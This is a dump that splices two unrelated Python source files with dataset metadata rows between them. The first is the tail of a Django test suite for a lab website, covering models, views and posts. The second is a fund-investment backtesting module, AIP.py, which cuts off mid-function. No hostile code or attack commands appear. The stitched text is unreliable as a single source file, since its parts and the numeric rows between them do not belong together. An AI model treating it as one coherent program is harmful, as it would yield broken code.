        lab_address = LabAddress(type='Primary',
                                 address=Address.objects.get(pk=1))
        lab_address.save()
        # pk == 1 presumes the fixture loads no LabAddress rows
        self.assertEqual(lab_address.pk, 1)

    def test_lab_address_unicode(self):
        '''The unicode representation of a
        :class:`~communication.models.LabAddress` matches that of its
        underlying :class:`~personnel.models.Address`.'''
        lab_address = LabAddress(type='Primary',
                                 address=Address.objects.get(pk=1))
        lab_address.save()
        self.assertEqual(lab_address.pk, 1)  # presumes empty fixture data
        self.assertEqual(lab_address.__unicode__(),
                         Address.objects.get(pk=1).__unicode__())

    def test_create_new_lab_location(self):
        '''A :class:`~communication.models.LabLocation` saves with only the
        required fields set.'''
        location = LabLocation(name='Memphis', type='City', priority=1)
        location.save()
        self.assertEqual(location.pk, 1)  # presumes empty fixture data

    def test_create_new_lab_location_all(self):
        '''A :class:`~communication.models.LabLocation` saves with every
        field populated.'''
        location = LabLocation(name='Memphis',
                               type='City',
                               priority=1,
                               address=Address.objects.get(pk=1),
                               url='www.cityofmemphis.org',
                               description='some description about the place',
                               lattitude=35.149534,
                               longitude=-90.04898)
        location.save()
        self.assertEqual(location.pk, 1)  # presumes empty fixture data

    def test_lab_location_unicode(self):
        '''The unicode representation of a
        :class:`~communication.models.LabLocation` is its name.'''
        location = LabLocation(name='Memphis', type='City', priority=1)
        location.save()
        self.assertEqual(location.pk, 1)
        self.assertEqual(location.__unicode__(), 'Memphis')
class CommunicationViewTests(BasicTests):
    '''This class tests the views associated with the :mod:`communication` app.'''

    def test_feed_details_view(self):
        """This tests the feed-details view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        test_response = self.client.get('/feeds')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'feed_details.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('google_calendar_id' in test_response.context)

    def test_lab_rules_view(self):
        '''This tests the lab-rules view.

        The tests ensure that the correct template is used.
        It also tests whether the correct context is passed (if included).
        This view uses a user with superuser permissions so does not test the permission levels for this view.'''
        test_response = self.client.get('/lab-rules')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'lab_rules.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('lab_rules' in test_response.context)
        self.assertTrue('lab_rules_source' in test_response.context)

    def test_data_resource_sharing_view(self):
        # Bug fix: this method was previously a second ``def test_lab_rules_view``,
        # which silently replaced the first definition so the lab-rules test never ran.
        '''This tests the data-resource-sharing view.

        The tests ensure that the correct template is used.
        It also tests whether the correct context is passed (if included).
        This view uses a user with superuser permissions so does not test the permission levels for this view.'''
        test_response = self.client.get('/data-resource-sharing')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'data_sharing_policy.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('data_sharing_policy' in test_response.context)
        self.assertTrue('data_sharing_policy_source' in test_response.context)

    def test_twitter_view(self):
        '''This tests the twitter view.

        Currently it just ensures that the template is loading correctly.
        '''
        test_response = self.client.get('/twitter')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'twitter_timeline.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('timeline' in test_response.context)

    def test_calendar_view(self):
        '''This tests the google-calendar view.

        Currently it just ensures that the template is loading correctly.
        '''
        test_response = self.client.get('/calendar')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'calendar.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('google_calendar_id' in test_response.context)

    def test_news_view(self):
        '''This tests the lab-news view.

        Currently it just ensures that the template is loading correctly.
        '''
        test_response = self.client.get('/news')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'lab_news.html')
        self.assertTemplateUsed(test_response, 'base.html')
        #self.assertTrue('statuses' in test_response.context)
        self.assertTrue('links' in test_response.context)
        #self.assertTrue('milestones' in test_response.context)

    def test_contact_page(self):
        '''This tests the contact-page view.

        Currently it just ensures that the template is loading correctly.
        '''
        test_response = self.client.get('/contact/')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'contact.html')
        self.assertTemplateUsed(test_response, 'base.html')

    def test_location_page(self):
        '''This tests the location view.

        Currently it ensures that the template is loading, and that that the location_list context is passed.
        '''
        test_response = self.client.get('/location')
        self.assertEqual(test_response.status_code, 200)
        self.assertTemplateUsed(test_response, 'location.html')
        self.assertTemplateUsed(test_response, 'base.html')
        self.assertTrue('lablocation_list' in test_response.context)
class PostModelTests(BasicTests):
    '''This class tests various aspects of the :class:`~papers.models.Post` model.'''

    fixtures = ['test_publication', 'test_publication_personnel', 'test_project', 'test_personnel']

    # URL used as the markdown source for every generated test post.
    MARKDOWN_URL = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md'

    def _saved_post(self, **extra_fields):
        '''Create and save a :class:`~papers.models.Post` with the required fields plus any ``extra_fields``.'''
        post = Post(post_title="Test Post",
                    author=Person.objects.get(pk=1),
                    markdown_url=self.MARKDOWN_URL,
                    **extra_fields)
        post.save()
        return post

    def test_create_new_post_minimum(self):
        '''This test creates a :class:`~papers.models.Post` with the required information only.'''
        # Presumes no Post objects are loaded from fixture data.
        self.assertEqual(self._saved_post().pk, 1)

    def test_create_new_post_all(self):
        '''This test creates a :class:`~papers.models.Post` with all fields entered.'''
        post = self._saved_post(paper=Publication.objects.get(pk=1),
                                project=Project.objects.get(pk=1))
        self.assertEqual(post.pk, 1)

    def test_post_unicode(self):
        '''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
        self.assertEqual(self._saved_post().__unicode__(), "Test Post")

    def test_post_slugify(self):
        '''This test creates a :class:`~papers.models.Post` and then verifies the slug field is generated from the title.'''
        self.assertEqual(self._saved_post().post_slug, "test-post")
class PostViewTests(BasicTests):
    '''These test the views associated with post objects.'''

    fixtures = ['test_post', 'test_publication', 'test_publication_personnel', 'test_project', 'test_personnel']

    def _assert_ok_with_templates(self, url, templates):
        '''Fetch ``url``, assert a 200 response rendered with every template in ``templates``, and return the response.'''
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        for template in templates:
            self.assertTemplateUsed(response, template)
        return response

    def _assert_missing(self, url):
        '''Fetch ``url`` and assert that it returns a 404.'''
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)

    def test_post_details_view(self):
        """This tests the post-details view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        response = self._assert_ok_with_templates(
            '/posts/fixture-post',
            ('post_detail.html', 'base.html', 'disqus_snippet.html', 'analytics_tracking.html'))
        self.assertTrue('post' in response.context)
        # A slug that is not in the fixture data should 404.
        self._assert_missing('/posts/not-a-fixture-post')

    def test_post_list(self):
        """This tests the post-list view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        response = self._assert_ok_with_templates(
            '/posts/', ('post_list.html', 'base.html', 'analytics_tracking.html'))
        self.assertTrue('post_list' in response.context)

    def test_post_new(self):
        """This tests the post-new view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        self._assert_ok_with_templates(
            '/posts/new', ('post_form.html', 'base.html', 'analytics_tracking.html'))

    def test_post_edit(self):
        """This tests the post-edit view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        self._assert_ok_with_templates(
            '/posts/fixture-post/edit', ('post_form.html', 'base.html', 'analytics_tracking.html'))
        self._assert_missing('/posts/not-a-fixture-post/edit')

    def test_post_delete(self):
        """This tests the post-delete view, ensuring that templates are loaded correctly.

        This view uses a user with superuser permissions so does not test the permission levels for this view."""
        self._assert_ok_with_templates(
            '/posts/fixture-post/delete', ('confirm_delete.html', 'base.html', 'analytics_tracking.html'))
        self._assert_missing('/posts/not-a-fixture-post/delete')
| 48.744966
| 135
| 0.658474
| 1,686
| 14,526
| 5.516607
| 0.110913
| 0.107085
| 0.097839
| 0.127943
| 0.823352
| 0.790883
| 0.741103
| 0.729384
| 0.714762
| 0.670896
| 0
| 0.007857
| 0.246523
| 14,526
| 298
| 136
| 48.744966
| 0.841937
| 0.313163
| 0
| 0.484277
| 0
| 0
| 0.153252
| 0.043637
| 0
| 0
| 0
| 0
| 0.440252
| 1
| 0.138365
| false
| 0
| 0.031447
| 0
| 0.213836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b501f5ae4284b9ffa5f05c2ff64466e86336c87a
| 17,647
|
py
|
Python
|
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
Funds/AIP.py
|
Seaaann/MyQuantReserch
|
acc1e3fd108b049285bcf35bc9d3aa5870143d02
|
[
"MIT"
] | null | null | null |
from fund_tools import *
import random
def AIP_Weekly(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment,
    freq="Monday",
    df=False,
    AIP=True,
    Total_investment=100000,
):
    """Backtest a weekly automatic-investment plan (AIP) or a lump-sum buy.

    Args:
        code: fund code understood by ``get_fund_net_worth``.
        start_date, end_date: backtest window passed to ``get_fund_net_worth``.
        fund_category: fund category passed to ``get_fund_net_worth``.
        fixed_investment: amount invested on each scheduled weekday.
        freq: English weekday name on which the fixed investment is made.
        df: if True return the full per-day DataFrame, otherwise a one-row summary.
        AIP: if True simulate the weekly plan; if False simulate investing
            ``Total_investment`` as a lump sum on the first day.
        Total_investment: lump-sum amount used when ``AIP`` is False.

    Returns:
        pandas.DataFrame: the enriched net-value table (``df=True``) or a
        single-row statistics summary (``df=False``).
    """
    fund_net_value = get_fund_net_worth(
        code, start_date=start_date, end_date=end_date, fund_category=fund_category
    )
    fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
    if AIP:
        fund_net_value["定投金额(本金)"] = 0
        # Bug fix: write with .loc instead of chained indexing
        # (df[col][i] = ...), whose assignment can be silently lost under
        # pandas copy-on-write.  Assumes the table has a default RangeIndex
        # from get_fund_net_worth -- TODO confirm.
        for i in range(len(fund_net_value["WeekDay"])):
            if fund_net_value["WeekDay"].values[i] == freq:
                fund_net_value.loc[i, "定投金额(本金)"] = fixed_investment
        fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
        fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
        fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
        fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
        fund_net_value["累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["平均成本"]
        ) * fund_net_value["累计份额"]
        # First row on which any money was actually invested.
        start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
        fund_net_value["持有天数(定投)"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
        ).dt.days + 1
        # Days before the first investment count as 0 holding days.
        fund_net_value["持有天数(定投)"] = fund_net_value["持有天数(定投)"].clip(lower=0)
        fund_net_value["年化收益率"] = (
            (fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
            / fund_net_value["累计定投金额(本金)"]
        ) ** (365 / fund_net_value["持有天数(定投)"]) - 1
        fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数(定投)"].values[-1],
                "定投时间": freq,
                "定投金额": fixed_investment,
                "分投期数": fund_net_value["累计定投金额(本金)"].values[-1] / fixed_investment,
                "总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
                "平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
                "累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
            },
            index=["AIP"],
        )
    else:
        # Lump-sum ("direct") investment of Total_investment on the first day.
        fund_net_value["直投金额(本金)"] = 0
        fund_net_value.loc[0, "直投金额(本金)"] = Total_investment
        fund_net_value["直投累计购买份额(不变)"] = (
            fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
        )
        fund_net_value["直投累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
        ) * fund_net_value["直投金额(本金)"][0]
        # NOTE(review): this divides profit by the share count rather than by
        # the invested principal -- preserved as-is; confirm the intended
        # definition of the cumulative-return column.
        fund_net_value["直投累计收益率"] = (
            fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
        )
        fund_net_value["持有天数(直投)"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
        ).dt.days + 1
        fund_net_value["直投累计年化收益率"] = (
            (fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
            / fund_net_value["直投金额(本金)"][0]
        ) ** (365 / fund_net_value["持有天数(直投)"]) - 1
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数(直投)"].values[-1],
                "总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
                "累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
            },
            index=["DIP"],
        )
    if df:
        return fund_net_value
    else:
        return Stat_df
def AIP_Weekly_Plans(
    Freq,
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment,
    AIP=True,
    df=False,
):
    """Run :func:`AIP_Weekly` for each weekday in ``Freq`` and stack the summaries.

    Args:
        Freq: iterable of English weekday names to backtest.
        AIP: forwarded to :func:`AIP_Weekly` (bug fix: it was previously
            hard-coded to True, silently ignoring the caller's value).
        df: unused; kept for backward compatibility with existing callers.
        (the remaining arguments are forwarded to :func:`AIP_Weekly`)

    Returns:
        pandas.DataFrame with one summary row per weekday (empty if ``Freq`` is empty).
    """
    # Collect the per-weekday summaries in a list and concatenate once:
    # DataFrame.append was removed in pandas 2.0 and was O(n^2) anyway.
    summaries = [
        AIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            freq=freq,
            AIP=AIP,
            df=False,
        )
        for freq in Freq
    ]
    if not summaries:
        return pd.DataFrame()
    return pd.concat(summaries)
def AIP_Weekly_plot(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment=1000,
    Freq=["Monday", "Tuesday", "Wednesday", "Thursday", "Friday"],
    figsize=(12, 8),
):
    """Plot the cumulative AIP return for each weekday in ``Freq``, with the lump-sum return on a secondary axis."""
    figure, axis = plt.subplots(figsize=figsize)
    # One cumulative-return curve per candidate investment weekday.
    for weekday in Freq:
        weekly_df = AIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            freq=weekday,
            AIP=True,
            df=True,
        )
        axis.plot(weekly_df.净值日期, weekly_df.累计收益率, label=weekday)
    axis.legend()
    axis.set_xlabel("净值日期", fontsize=14)
    axis.set_ylabel("定投累计收益", fontsize=14)
    # Lump-sum ("direct") investment curve drawn on a secondary y axis.
    direct_df = AIP_Weekly(
        code,
        start_date=start_date,
        end_date=end_date,
        fund_category=fund_category,
        fixed_investment=1000,
        freq="Monday",
        AIP=False,
        df=True,
    )
    secondary_axis = axis.twinx()
    secondary_axis.plot(direct_df.净值日期, direct_df["直投累计收益率"], "--", label="直投累计收益率")
    secondary_axis.legend(loc="upper right")
    secondary_axis.set_ylabel("直投累计收益率", fontsize=14)
    plt.show()
def Max_AIP_Weekly(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment,
    Threshold=(-3.0, 2.0),
    AIP=True,
    df=False,
    Total_investment=100000,
):
    """Backtest a threshold-triggered buy-low / sell-high plan or a lump-sum buy.

    Buys ``fixed_investment`` on any day the daily growth rate is at or below
    ``Threshold[0]``, and sells ``fixed_investment`` on any day it is at or
    above ``Threshold[1]`` while more than one installment of principal is
    invested.

    Args:
        code: fund code understood by ``get_fund_net_worth``.
        start_date, end_date, fund_category: passed to ``get_fund_net_worth``.
        fixed_investment: amount bought or sold per triggered day.
        Threshold: (buy trigger, sell trigger) daily growth-rate thresholds.
        AIP: if True simulate the triggered plan; if False simulate investing
            ``Total_investment`` as a lump sum on the first day.
        df: if True return the full per-day DataFrame, otherwise a one-row summary.
        Total_investment: lump-sum amount used when ``AIP`` is False.

    Returns:
        pandas.DataFrame: the enriched net-value table (``df=True``) or a
        single-row statistics summary (``df=False``).
    """
    fund_net_value = get_fund_net_worth(
        code, start_date=start_date, end_date=end_date, fund_category=fund_category
    )
    fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
    if AIP:
        fund_net_value["定投金额(本金)"] = 0
        fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
        # Bug fix: write with .loc instead of chained indexing
        # (df[col][i] = ...), whose assignment can be silently lost under
        # pandas copy-on-write.  The running cumsum must be refreshed after
        # each write because the sell branch reads it at i - 1.  Assumes a
        # default RangeIndex from get_fund_net_worth -- TODO confirm.
        for i in range(len(fund_net_value["日增长率"])):
            if fund_net_value["日增长率"].values[i] <= Threshold[0]:
                fund_net_value.loc[i, "定投金额(本金)"] = fixed_investment
                fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
            elif (fund_net_value["日增长率"].values[i] >= Threshold[1]) & (
                fund_net_value["累计定投金额(本金)"].values[i - 1] > fixed_investment
            ):
                fund_net_value.loc[i, "定投金额(本金)"] = -fixed_investment
                fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
        fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
        fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
        fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
        fund_net_value["累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["平均成本"]
        ) * fund_net_value["累计份额"]
        # First row on which any money was actually invested.
        start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
        fund_net_value["持有天数"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
        ).dt.days + 1
        # Days before the first investment count as 0 holding days.
        fund_net_value["持有天数"] = fund_net_value["持有天数"].clip(lower=0)
        fund_net_value["年化收益率"] = (
            (fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
            / fund_net_value["累计定投金额(本金)"]
        ) ** (365 / fund_net_value["持有天数"]) - 1
        fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数"].values[-1],
                "触发投资门槛(低买入)": Threshold[0],
                "触发投资门槛(高卖出)": Threshold[1],
                "单次金额": fixed_investment,
                # Bug fix: compare against fixed_investment instead of the
                # hard-coded literals 1000 / -1000, which produced wrong
                # buy/sell counts for any other installment size.
                "买入次数": len(fund_net_value[fund_net_value["定投金额(本金)"] == fixed_investment]),
                "卖出次数": len(fund_net_value[fund_net_value["定投金额(本金)"] == -fixed_investment]),
                "总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
                "平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
                "累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
            },
            index=["Plan"],
        )
    else:
        # Lump-sum ("direct") investment of Total_investment on the first day.
        fund_net_value["直投金额(本金)"] = 0
        fund_net_value.loc[0, "直投金额(本金)"] = Total_investment
        fund_net_value["直投累计购买份额(不变)"] = (
            fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
        )
        fund_net_value["直投累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
        ) * fund_net_value["直投金额(本金)"][0]
        # NOTE(review): profit divided by share count, not by principal --
        # preserved as-is; confirm the intended definition.
        fund_net_value["直投累计收益率"] = (
            fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
        )
        fund_net_value["持有天数(直投)"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
        ).dt.days + 1
        fund_net_value["直投累计年化收益率"] = (
            (fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
            / fund_net_value["直投金额(本金)"][0]
        ) ** (365 / fund_net_value["持有天数(直投)"]) - 1
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数(直投)"].values[-1],
                "总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
                "累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
            },
            index=["DIP"],
        )
    if df:
        return fund_net_value
    else:
        return Stat_df
def Max_AIP_Weekly_Plans(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment,
    upper_threshold,
    lower_threshold,
):
    """Backtest every (lower, upper) threshold combination and stack the summaries.

    Args:
        upper_threshold: iterable of sell-trigger growth rates.
        lower_threshold: iterable of buy-trigger growth rates.
        (the remaining arguments are forwarded to :func:`Max_AIP_Weekly`)

    Returns:
        pandas.DataFrame with one summary row per threshold pair (empty if
        either threshold iterable is empty).
    """
    threshold_pairs = list(itertools.product(lower_threshold, upper_threshold))
    # Collect the summaries and concatenate once: DataFrame.append was
    # removed in pandas 2.0 and was O(n^2) anyway.
    summaries = [
        Max_AIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            Threshold=pair,
            df=False,
        )
        for pair in threshold_pairs
    ]
    if not summaries:
        return pd.DataFrame()
    return pd.concat(summaries)
def Max_AIP_Weekly_plot(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment=1000,
    max_plan={
        "plan 1": (-1.0, 1.0),
        "plan 2": (-2.0, 2.0),
        "plan 3": (-3.0, 3.0),
        "plan 4": (-3.0, 2.0),
        "plan 5": (-3.0, 1.0),
    },
    figsize=(12, 8),
):
    """Plot the cumulative return of each threshold plan in ``max_plan``, with the lump-sum return on a secondary axis."""
    figure, axis = plt.subplots(figsize=figsize)
    # One cumulative-return curve per (buy trigger, sell trigger) plan.
    for plan_name in max_plan:
        plan_df = Max_AIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            Threshold=max_plan[plan_name],
            AIP=True,
            df=True,
        )
        axis.plot(plan_df.净值日期, plan_df.累计收益率, label=plan_name)
    axis.legend()
    axis.set_xlabel("净值日期", fontsize=14)
    axis.set_ylabel("定投累计收益", fontsize=14)
    # Lump-sum ("direct") investment curve drawn on a secondary y axis.
    direct_df = Max_AIP_Weekly(
        code,
        start_date=start_date,
        end_date=end_date,
        fund_category=fund_category,
        fixed_investment=1000,
        AIP=False,
        df=True,
    )
    secondary_axis = axis.twinx()
    secondary_axis.plot(
        direct_df.净值日期, direct_df["直投累计收益率"], "r--", label="直投累计收益率"
    )
    secondary_axis.legend(loc="upper right")
    secondary_axis.set_ylabel("直投累计收益率", fontsize=14)
    plt.show()
def StochasticAIP_Weekly(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment,
    Freq,
    seed,
    df=False,
    AIP=True,
    Total_investment=100000,
):
    """Backtest a plan that invests on one randomly chosen day per window.

    Within every window of ``Freq`` trading days, one day is picked at random
    and ``fixed_investment`` is invested on it.

    Args:
        code: fund code understood by ``get_fund_net_worth``.
        start_date, end_date, fund_category: passed to ``get_fund_net_worth``.
        fixed_investment: amount invested on each randomly chosen day.
        Freq: window length, in trading days, per random investment.
        seed: random seed making the day choices reproducible.
        df: if True return the full per-day DataFrame, otherwise a one-row summary.
        AIP: if True simulate the random plan; if False simulate investing
            ``Total_investment`` as a lump sum on the first day.
        Total_investment: lump-sum amount used when ``AIP`` is False.

    Returns:
        pandas.DataFrame: the enriched net-value table (``df=True``) or a
        single-row statistics summary (``df=False``).
    """
    fund_net_value = get_fund_net_worth(
        code, start_date=start_date, end_date=end_date, fund_category=fund_category
    )
    fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
    if AIP:
        fund_net_value["定投金额(本金)"] = 0
        # Bug fix: the original did ``random.seed = seed``, which rebinds the
        # seed *function* to an integer instead of calling it, so the RNG was
        # never actually seeded and runs were not reproducible.
        random.seed(seed)
        final_day = list(range(0, len(fund_net_value["WeekDay"]), Freq))[-1]
        for i in list(range(0, final_day, Freq)):
            # Pick one random trading day inside each window of Freq days.
            invest_date = random.choice(fund_net_value["WeekDay"][i : i + Freq].values)
            for j in range(i, i + Freq):
                if fund_net_value["WeekDay"].values[j] == invest_date:
                    # .loc instead of chained indexing, whose write can be
                    # silently lost under pandas copy-on-write.  Assumes a
                    # default RangeIndex -- TODO confirm.
                    fund_net_value.loc[j, "定投金额(本金)"] = fixed_investment
        fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
        fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
        fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
        fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
        fund_net_value["累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["平均成本"]
        ) * fund_net_value["累计份额"]
        # First row on which any money was actually invested.
        start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
        fund_net_value["持有天数"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
        ).dt.days + 1
        # Days before the first investment count as 0 holding days.
        fund_net_value["持有天数"] = fund_net_value["持有天数"].clip(lower=0)
        fund_net_value["年化收益率"] = (
            (fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
            / fund_net_value["累计定投金额(本金)"]
        ) ** (365 / fund_net_value["持有天数"]) - 1
        fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数"].values[-1],
                "定投时间": "随机",
                "定投金额": fixed_investment,
                "分投期数": fund_net_value["累计定投金额(本金)"].values[-1] / fixed_investment,
                "总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
                "平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
                "累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
            },
            index=["Plan"],
        )
    else:
        # Lump-sum ("direct") investment of Total_investment on the first day.
        fund_net_value["直投金额(本金)"] = 0
        fund_net_value.loc[0, "直投金额(本金)"] = Total_investment
        fund_net_value["直投累计购买份额(不变)"] = (
            fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
        )
        fund_net_value["直投累计收益"] = (
            fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
        ) * fund_net_value["直投金额(本金)"][0]
        # NOTE(review): profit divided by share count, not by principal --
        # preserved as-is; confirm the intended definition.
        fund_net_value["直投累计收益率"] = (
            fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
        )
        fund_net_value["持有天数(直投)"] = (
            fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
        ).dt.days + 1
        fund_net_value["直投累计年化收益率"] = (
            (fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
            / fund_net_value["直投金额(本金)"][0]
        ) ** (365 / fund_net_value["持有天数(直投)"]) - 1
        Stat_df = pd.DataFrame(
            {
                "基金代码": code,
                "持有天数": fund_net_value["持有天数(直投)"].values[-1],
                "总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
                "累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
                "累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
                "年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
            },
            index=["DIP"],
        )
    if df:
        return fund_net_value
    else:
        return Stat_df
def StochasticAIP_Weekly_Plans(
    Freq, seed, code, start_date, end_date, fund_category, fixed_investment
):
    """Run :func:`StochasticAIP_Weekly` once per seed and stack the summaries.

    Args:
        Freq: window length (trading days) forwarded to :func:`StochasticAIP_Weekly`.
        seed: iterable of integer random seeds; one backtest is run per seed.
        (the remaining arguments are forwarded to :func:`StochasticAIP_Weekly`)

    Returns:
        pandas.DataFrame with one summary row per seed (empty if ``seed`` is empty).
    """
    # Fixes from the original: the loop variable no longer shadows the
    # ``seed`` parameter, and the summaries are concatenated once because
